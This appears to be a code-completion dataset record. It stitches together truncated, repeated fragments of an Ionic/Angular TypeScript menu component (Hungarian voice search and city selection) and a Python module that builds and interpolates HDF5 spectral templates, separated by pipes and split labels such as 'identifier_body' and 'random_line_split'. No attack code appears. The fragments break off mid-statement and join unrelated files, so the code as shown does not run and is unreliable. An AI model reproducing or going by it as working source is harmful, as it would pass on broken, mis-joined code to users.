// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// | this.openSpeech();
}
| conditional_block |
menus.component.ts | );
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) |
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// | {
this.iab.create( url, '_system' );
} | identifier_body |
menus.component.ts | ('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2"); | this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh(); | random_line_split |
|
template_model.py | (parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
| self.K.unit = y_unit
self.scale.unit = 1 / x_unit | identifier_body |
|
template_model.py | self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def | (self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join | add_method | identifier_name |
template_model.py | self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
